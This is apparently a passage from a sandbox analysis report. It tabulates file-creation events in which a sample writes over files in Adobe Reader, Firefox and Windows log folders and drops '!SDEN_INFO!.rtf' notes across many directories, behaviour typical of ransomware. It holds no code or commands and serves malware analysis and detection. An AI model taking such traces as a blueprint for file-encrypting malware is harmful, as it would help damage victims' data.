| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES-valencia\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-HK\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CL\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CA\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CH\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\it-IT\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ja-JP\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-BE\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-NL\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sk-SK\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-TW\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\SetupUtility.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wabmig.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\convertible-suicide-construction.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.021.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sl-SI\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\tzdb.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\bad_6088DED4F047F45E.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\Accessible.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\WinMail.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\shield-recipe-client@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\dictionaries\en-US.dic | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-MUI%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SettingSync%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Store%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\pingsender.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\updater.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\rempl\remsh.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\desktop.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
